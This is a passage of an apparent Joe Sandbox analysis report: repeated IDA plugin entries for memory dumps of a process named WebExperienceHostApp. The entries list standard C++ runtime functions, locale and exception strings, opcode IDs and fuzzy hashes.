                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 4223619315-393685449
                                                                    • Opcode ID: edc5f55d8364ed346ae9e81db86cccb1f66bda3bd14ed8078bac2ea6355eac48
                                                                    • Instruction ID: 8ff922e5ed9faf809e46d6c72527de3feb27f800b680784d0711af6a22758414
                                                                    • Opcode Fuzzy Hash: edc5f55d8364ed346ae9e81db86cccb1f66bda3bd14ed8078bac2ea6355eac48
                                                                    • Instruction Fuzzy Hash: 81E19572A08F418AEB14DF66D4402AE77A4FB65BA8F100175EEAD67B65CF3CE490C704
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Replicator::operator[]
                                                                    • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                    • API String ID: 3676697650-3207858774
                                                                    • Opcode ID: 068e360b79be31260e9f0f338d3f50443f14e550a52f9abb55243442d8c120c9
                                                                    • Instruction ID: 30dfe9cf955e8efed9348a469c2220daaa767b6933fb1e1ce913c535dc66a921
                                                                    • Opcode Fuzzy Hash: 068e360b79be31260e9f0f338d3f50443f14e550a52f9abb55243442d8c120c9
                                                                    • Instruction Fuzzy Hash: 18919C32B08E468DFB10DF62D4502BC67A1AB68764F8841B2DA6D637B6DF3CE504D358
                                                                    APIs
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB00
                                                                      • Part of subcall function 00007FFE002BBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB08
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB11
                                                                      • Part of subcall function 00007FFE002BBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB2D
                                                                    • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE0029B06E), ref: 00007FFE00297083
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE0029B06E), ref: 00007FFE002970A3
                                                                    • _Maklocstr.LIBCPMT ref: 00007FFE002970BD
                                                                    • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE0029B06E), ref: 00007FFE002970C6
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE0029B06E), ref: 00007FFE002970E6
                                                                    • _Maklocstr.LIBCPMT ref: 00007FFE00297100
                                                                    • _Maklocstr.LIBCPMT ref: 00007FFE00297115
                                                                      • Part of subcall function 00007FFE00284D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D32
                                                                      • Part of subcall function 00007FFE00284D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D58
                                                                      • Part of subcall function 00007FFE00284D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D70
                                                                    Strings
                                                                    • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFE002970AD
                                                                    • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFE002970F0
                                                                    • :AM:am:PM:pm, xrefs: 00007FFE0029710E
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstrfree$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
                                                                    • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                    • API String ID: 2460671452-35662545
                                                                    • Opcode ID: 68a3b1b276eb7da605c86357e63600b8dc1e5b54f3908e2d283bd71975fe3a53
                                                                    • Instruction ID: 7a9fa4cd1ea90c90dd8dd4c0ea8c287a205b8bc42883c86bb879327e66f3d098
                                                                    • Opcode Fuzzy Hash: 68a3b1b276eb7da605c86357e63600b8dc1e5b54f3908e2d283bd71975fe3a53
                                                                    • Instruction Fuzzy Hash: D3312D26A18B4686E710DF21E8402A97BA5FBD8F80F498536DF4D4376AEF3CE581C340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiStringWide$freemalloc$__strncnt
                                                                    • String ID:
                                                                    • API String ID: 1733283546-0
                                                                    • Opcode ID: 7481873b54e877f7fc9af2c00e2f3984987d914e500c084b73b5f1e45f384833
                                                                    • Instruction ID: 0d242019f0d197bfe1aef1426ab4b080e81fee8b2a8543fdf6aac448706b5e7b
                                                                    • Opcode Fuzzy Hash: 7481873b54e877f7fc9af2c00e2f3984987d914e500c084b73b5f1e45f384833
                                                                    • Instruction Fuzzy Hash: CC819036609B4286EB20CF51E4503796BE1FB84BA8F144235EB5E17BE9DF7CE8498304
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Xp_setw$Xp_setn$Xp_addx$Stofltisspaceisxdigit
                                                                    • String ID:
                                                                    • API String ID: 3166507417-0
                                                                    • Opcode ID: a2a4b0507d6de304d91fa30e7ec2a10c1d98e7d84d314cc1b7b0df0453b4069f
                                                                    • Instruction ID: 11390ccc526c562c4e6fe35a26c055a9e781f9a7a8e145d21058d4dac5592259
                                                                    • Opcode Fuzzy Hash: a2a4b0507d6de304d91fa30e7ec2a10c1d98e7d84d314cc1b7b0df0453b4069f
                                                                    • Instruction Fuzzy Hash: 6F61A222F085439AEB11DFA2D4906FD2B65AB94748F504536DF0D63BAEDE3CE94A8300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 2003779279-1866435925
                                                                    • Opcode ID: a6b4dea8a168317dac851dd429efa45bd2771e1e18792c249c39bd327d446b57
                                                                    • Instruction ID: f920350105e32fca0528b6a692e5b8068f0d27814fa83d4ccff2a4a009193e2e
                                                                    • Opcode Fuzzy Hash: a6b4dea8a168317dac851dd429efa45bd2771e1e18792c249c39bd327d446b57
                                                                    • Instruction Fuzzy Hash: 0291C122A18A5B85EF64CB15D4917B92B60FBC0B88F948036DF4E477BADF2DD946C301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+
                                                                    • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                    • API String ID: 2943138195-1464470183
                                                                    • Opcode ID: 2a39ff73fab8a5f8cf54c613ca86ba6d613e7bbbceaec38d40d1587625a9a752
                                                                    • Instruction ID: e54b737e3e918c8281fa31f835f45051a52c491105867cc7e4714247ed8cdb35
                                                                    • Opcode Fuzzy Hash: 2a39ff73fab8a5f8cf54c613ca86ba6d613e7bbbceaec38d40d1587625a9a752
                                                                    • Instruction Fuzzy Hash: 42514772E18A168DFB14CB66E8905AC27B0BB243A4F504279EE1D66AB9DF38E505C304
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Xp_setw$Xp_setn$Xp_addx$iswspaceiswxdigit
                                                                    • String ID:
                                                                    • API String ID: 3781602613-0
                                                                    • Opcode ID: b37f4c65fcaae6089a39f6864dfb20dfbddd16cc03fc4d6b826aaf6d26e5b500
                                                                    • Instruction ID: b5a8f464c8d705f6c8031da8f99eb722be96bf5369f4f8141a6b27e850f8d8d2
                                                                    • Opcode Fuzzy Hash: b37f4c65fcaae6089a39f6864dfb20dfbddd16cc03fc4d6b826aaf6d26e5b500
                                                                    • Instruction Fuzzy Hash: 7361A522F085439AE711EFA2D4905FD2B65AB94748F604536DF0D63BAFDE3CE94A8700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+
                                                                    • String ID:
                                                                    • API String ID: 2943138195-0
                                                                    • Opcode ID: dffebbea1b9ec54e41ee59c5f9df16e35c1e11239b438fd42c02bfbe0f2f9bce
                                                                    • Instruction ID: ea4ce2b9ec9a07cff04acb1a7bb261830838a5782c778f260d25f9d12c3355ec
                                                                    • Opcode Fuzzy Hash: dffebbea1b9ec54e41ee59c5f9df16e35c1e11239b438fd42c02bfbe0f2f9bce
                                                                    • Instruction Fuzzy Hash: 6D618A62B04F669CFB00CBA2D8801EC27B1FB247A8F404575DE1D2BAA9DF78D545C344
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 211107550-393685449
                                                                    • Opcode ID: 85374f18d14079de111c801c7233a0368ceba0e7784a87de6593dae95347d848
                                                                    • Instruction ID: af8c846c22cd72ddec57fdf5444a00c8d720eaea340e4eed0fb1baf2db2c0179
                                                                    • Opcode Fuzzy Hash: 85374f18d14079de111c801c7233a0368ceba0e7784a87de6593dae95347d848
                                                                    • Instruction Fuzzy Hash: 8CE1B372A08B818EE710DF36D4802AE77A0FB647B8F144175DAAD67765CF38E585CB04
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memchrtolower$_errnoisspace
                                                                    • String ID: 0$0123456789abcdefghijklmnopqrstuvwxyz
                                                                    • API String ID: 3508154992-2692187688
                                                                    • Opcode ID: 28ebbe5085ce22d7c59ed57fe41f67953adc3779f489bac788e36eaca0986cc2
                                                                    • Instruction ID: da07d723c773f1834abb751f65dbeb21de2ccb3fbfdb815210be6d4cdc7ea1c0
                                                                    • Opcode Fuzzy Hash: 28ebbe5085ce22d7c59ed57fe41f67953adc3779f489bac788e36eaca0986cc2
                                                                    • Instruction Fuzzy Hash: E351E812A0C6D746EB618B24A45437D7FA5ABD5794F484132CFAE063BEDE3CA9428702
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                    • String ID: 8}-$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 2003779279-4077698042
                                                                    • Opcode ID: 4b79d5893f130ff8fdc1ea0ab7b7df0118dd7d56f78d91c6625c63aa5aa301b0
                                                                    • Instruction ID: cc5f402acab1c0f6909432cbb87bca9ea01ba9b51c2306d5ac41ceee69eab655
                                                                    • Opcode Fuzzy Hash: 4b79d5893f130ff8fdc1ea0ab7b7df0118dd7d56f78d91c6625c63aa5aa301b0
                                                                    • Instruction Fuzzy Hash: BE519E66A09D4B81EB11DB59D4842B86BA0FBC4B88F944136DF5E877BEDF2CE945C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+
                                                                    • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                    • API String ID: 2943138195-2239912363
                                                                    • Opcode ID: e0836a3629a813ef90ef895af03e740072fc2db4661fc217a7dce682d3bfee39
                                                                    • Instruction ID: 760860fcd55ecc288aed9267a01d1e74b89efa5764f0baf735c6f5ccf8bd8b60
                                                                    • Opcode Fuzzy Hash: e0836a3629a813ef90ef895af03e740072fc2db4661fc217a7dce682d3bfee39
                                                                    • Instruction Fuzzy Hash: 54514A62E08F528DFB15CF62D8402BD7BB4AB28768F4441B5DE5D227A9DF3CA184C718
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 1099746521-1866435925
                                                                    • Opcode ID: a6bf273394677bb2e99abd8e534fce184576f9646bbe71793b055ca8774240fa
                                                                    • Instruction ID: 46a65cfdb218f986a084f97becdc6c29ca9c2bab9bae98c78557f381e2e59f6e
                                                                    • Opcode Fuzzy Hash: a6bf273394677bb2e99abd8e534fce184576f9646bbe71793b055ca8774240fa
                                                                    • Instruction Fuzzy Hash: 2021E066E1E50795EA10DB40D84A6F91B61AFD0348F984037DB8E067BFEF2CEA49C340
                                                                    APIs
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB00
                                                                      • Part of subcall function 00007FFE002BBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB08
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB11
                                                                      • Part of subcall function 00007FFE002BBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB2D
                                                                    • _W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE00297182
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE002971A2
                                                                    • _W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE002971C0
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE002971E0
                                                                      • Part of subcall function 00007FFE00284D90: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE002971DD,?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE00284DB9
                                                                      • Part of subcall function 00007FFE00284D90: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE002971DD,?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE00284DE8
                                                                      • Part of subcall function 00007FFE00284D90: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE002971DD,?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE00284DFF
                                                                    Strings
                                                                    • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFE002971AC
                                                                    • :AM:am:PM:pm, xrefs: 00007FFE002971FA
                                                                    • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FFE002971EA
                                                                    • JB(, xrefs: 00007FFE00297188
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
                                                                    • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday$JB(
                                                                    • API String ID: 1539549574-3646264156
                                                                    • Opcode ID: 23b0d397a768917b381d48ffc544097c40ac7a10155b45c2e50111aa9d8ed0a0
                                                                    • Instruction ID: 52a09cb941d50051002a837a403987c1d87f40f543de76af1e4935f85d85d953
                                                                    • Opcode Fuzzy Hash: 23b0d397a768917b381d48ffc544097c40ac7a10155b45c2e50111aa9d8ed0a0
                                                                    • Instruction Fuzzy Hash: 53211C22A09F4686EA11DF21E8442697BA0FB85B84F884535DB8E5376AEF7CE581C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 2003779279-1866435925
                                                                    • Opcode ID: 9cb79d3691d168e0564d9f4c501592dad693ea5c078e9f50b8527a96bed53c60
                                                                    • Instruction ID: 2655749556840aee01ca378dd309755c1e67775cb86d8b4a1858bc9d97ce1043
                                                                    • Opcode Fuzzy Hash: 9cb79d3691d168e0564d9f4c501592dad693ea5c078e9f50b8527a96bed53c60
                                                                    • Instruction Fuzzy Hash: 80618E22608A4785EB64CB15D4957B96B60FBC0F88F848036EB4E477BADF7DD846C341
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
